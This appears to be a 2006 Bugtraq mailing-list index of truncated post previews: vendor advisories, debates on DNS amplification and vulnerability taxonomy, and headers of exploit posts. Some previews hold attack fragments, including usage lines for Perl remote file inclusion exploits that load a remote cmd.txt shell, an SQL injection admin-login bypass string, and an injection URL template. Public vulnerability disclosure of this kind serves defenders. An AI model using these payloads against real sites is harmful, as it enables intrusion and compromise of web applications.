Steven M. Christey wrote:
> The fact that a product has a long history of bugs should not be
> regarded as an indicator of its current level of security compared to
> other products.
>
Why? Past performance may not be a perfect predictor of future
performance, bit it is very often one of the best

[ more ]  [ reply ]

======================================================================

Secunia Research 03/04/2006

- AN HTTPD Script Source Disclosure Vulnerability -

======================================================================
Table of Contents

Affected Software..........

[ more ]  [ reply ]

<?php
/*
ReloadCMS <= 1.2.5stable Cross site scripting / remote command execution

software site: http://reloadcms.com/
description: "ReloadCMS is a free CMS written on PHP and based on flat files."

vulnerability:
ReloadCMS do not properly sanitize User-Agent request header before to store it
in st

[ more ]  [ reply ]

Moroccan Security Team (|ucif3r)
Greetz To All Freind

Phpwebgallery 1.4.1 is vulnerable to SQL Injection Attacks

The flaw is due to input validation errors in the "category.php" script when handling the "search"variables, which could be exploited by malicious people to conduct SQL injection attac

[ more ]  [ reply ]

===========================================================
Ubuntu Security Notice USN-266-1 April 03, 2006
dia vulnerabilities
CVE-2006-1550
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu

[ more ]  [ reply ]

Hello Bugtraq,

we would like to announce the recent GeSWall update. GeSWall is an
intrusion prevention system for Windows. It applies a security policy
that effectively precludes damage from various attacks and malicious
software.

Instead of blocking particular attack techniques GeSWall focuses on

[ more ]  [ reply ]

Hello, Bugtraq,

I am not quite sure this hasn't been already discussed before, if so,
please excuse me...

There were quite a lot of "DNS DoS-ing with spoofed udp"-related
messages here recently. What I'd like to discuss is something similar in
concept - a denial of service via spoofing the source

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Stephen Samuel wrote:
| To put it another way: UDP as a purely connectionless
| protocol is fast becoming a liability in situations where
| significant amplification is possible.

My thoughts exactly. This attack is possible because of a design limitat

[ more ]  [ reply ]

Recently i saw http://seclists.org/lists/fulldisclosure/2006/Mar/1815.html

The person who found it sent it to me before sending it elsewhere, as i
thought he wouldn't send it to any mailing list, i decided to verify the
information, and the directory traversal isn't just a directory traversal,
if y

[ more ]  [ reply ]

#!/usr/bin/perl
##
# PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit
# Bug Found By uid0 code by zod
##
# (c) 2006
# ExploiterCode.com
##
# usage:
# perl pnc.pl <location of PNC> <cmd shell location> <cmd shell variable>
#
# perl pnc.pl http://site.com/PNC/ http://site.com/cmd.txt cmd
#
# cmd shel

[ more ]  [ reply ]

Using 2.06 is a guaranteed ticket to your web site being hacked. phpBB is at 2.19 at the moment and there have been major security flaws found in each previous version - including 2.06

Patch your 2.06 up to 2.19 or die... because there are bots out there that are looking for lazy web admins who di

[ more ]  [ reply ]

Description :

/* =================================================
File created by Andries Bruinsma
(c) FleXiBle Development (FXB)
Web: http://www.ahbruinsma.nl
Email: renegade (at) clanflex (dot) com [email concealed]
===================================================
File: main.php
Version: 3.0
Date started: 10th M

[ more ]  [ reply ]

On Thu, 30 Mar 2006, Geo. wrote:

> It's a security issue. He who controls the dns server controls you, yes?
>
> Ok we are talking about locking down DNS like we locked down smtp relay. So
> if you want to send a mail today can you just use any smtp server you want
> or are you severly limited, poss

[ more ]  [ reply ]

#!/usr/bin/perl
##
# SQuery <= 4.5 Remote File Inclusion Exploit
# Bug Found By uid0 code by zod
##
# (c) 2006
# ExploiterCode.com
##
# usage:
# perl squery.pl <location of SQuery> <cmd shell location> <cmd shell variable>
#
# perl squery.pl http://site.com/SQuery/ http://site.com/cmd.txt cmd
#
# c

[ more ]  [ reply ]

About that xss, it was really a normal xss, like i wrote in my second post
(i respect rgod's work because he always made good analysis and good
advisories). But there are indeed many vulnerabilities that are classified
as XSS while they were much more than a XSS, or a XSS in a PHP error
message.

Th

[ more ]  [ reply ]

Geo. wrote:
> The flood is a flood of answers not queries, you spoof the source address of
> a query with the address of your target, the target gets the response from
> the dns server. A cache on the dns server just makes it a more efficient
> response.

Queries are bad enough. This can be played w

[ more ]  [ reply ]

Vendor : linksubmit
Version : All Version
www : http://www.phpselect.com
AUTHOR : s3rv3r_hack3r
you can submit html tag's in $description (linksubmit.php)

Exploit :
#!/usr/bin/perl
#
# Exploit by s3rv3r_hack3r
# Special Thanx : hessamx , f0rk ,sattar.li , stanic, mfox,blood moon and..
########

[ more ]  [ reply ]

Vendor : SiteMan
Target Page : admin_login.asp
Bug Finder : S3rv3r_hack3r
administrator panel (demo): http://www.ispdemos.com/Demo/SiteMan/admin_login.asp
WWW : http://www.ispofegypt.com/
you can login to admin_login.asp with >>
user : admin
pass : ' or '

[ more ]  [ reply ]

In a post-disclosure analysis [1] of a security issue announced by
rgod [2], Siegfried observed that the reported XSS actually originated
from a file inclusion vulnerability, in which the XSS was reflected
back from an error message when the file inclusion failed:

>About the xss, it is an xss in t

[ more ]  [ reply ]

Website : http://toya.net.pl/~julas/w3g/
Version : 1.8c

Description :

Warcraft III Replay Parser for PHP? What is that? Maybe you know or maybe not that Warcraft III replay files (*.w3g) have much information inside. Almost everything can be pulled out of them: players accounts, races, colours, h

[ more ]  [ reply ]

#######################################################################

Luigi Auriemma

Application: Zdaemon
http://www.zdaemon.org
(and also X-Doom http://www.doom2.net/~xdoom/)
Versions: <= 1.08.01
Platforms: Windows and Linux
Bugs

[ more ]  [ reply ]

author: DaBDouB-MoSiKaR [Moroccan Security Team]
site: http://www.dbbs.sup.fr/
greetz to : [Moroccan Security Team] CiM-TeaM and All Freinds
exemple:
http://[target]/topics.php?fid=3&limite=[sql]
inbox:DaBDouB-MoSiKaR[at]moroccan-security[dot]com

[ more ]  [ reply ]

--Security Report--
Advisory: EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 29/03/06 21:33 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com [email concealed]
Web: http://www.nukedx.com
}
---
Vendor: EzASPSite (http://www.

[ more ]  [ reply ]

> > servers and you have just created a really powerful control mechanism
for
> > entities to control large sections of the internet since folks from
those
> > sections won't be able to use anyone else's DNS servers or even run
their
> > own (much like port 25 blocking limits who can run a mail serv

[ more ]  [ reply ]

Isn't the real meat of this issue the commands an unprivileged user is
permitted to execute via sudo?

Sudo isn't a blanket 'execute anything' unless it's set up that way.
Instead, you should carefully choose the specific command(s) that the user
needs to be allowed to execute. That should involve

[ more ]  [ reply ]

David M Chess wrote:
> But many of us *love* to argue about taxonomies and word meanings (it's
> cheaper than booze anyway). *8)
>
> To my mind, if the attacker needs to be logged into an account on the
> machine being attacked then the vulnerability is local; if the attacker
> just has to be a

[ more ]  [ reply ]

Dear Raven,

raven wrote:
> Bugtraq @ SNSecurity wrote:
>>
>> Quick Summary:
>> ************************************************************************

>>
>> Product : Movilnet's Web SMS.
>> Version : In-production versions.
>> Vendor : Movilnet - http://www.movilnet.com.ve/
>> Class : Remote
>> Cr

[ more ]  [ reply ]

Hi,

The OPSA professional security analyst training from ISESTORM will be
available in real time!!

This event has only been approved for 1 time. ISECOM does not directly
provide any certification training outside of the annual ISESTORM event.
ISECOM will not be offering DVDs or other recordings of

[ more ]  [ reply ]

>> really did not knew much more than was discovered. Meanwhile I am bit
>> disappointed that we had nearly month such a bug in wild and software
>> distributors like SuSE in my case did not published patches. I think as
>> long enough time passed and I hope distributors maybe need to see it - I

[ more ]  [ reply ]

Just a quick followup and clarification:

> -----Original Message-----
> From: Michael Scheidell
> Sent: Wednesday, March 15, 2006 8:38 AM
> To: bugtraq (at) securityfocus (dot) com [email concealed]
> Subject: WebVulnCrawl searching excluded directories for
> hackable web servers
>
>
> What he is doing is a violation of th

[ more ]  [ reply ]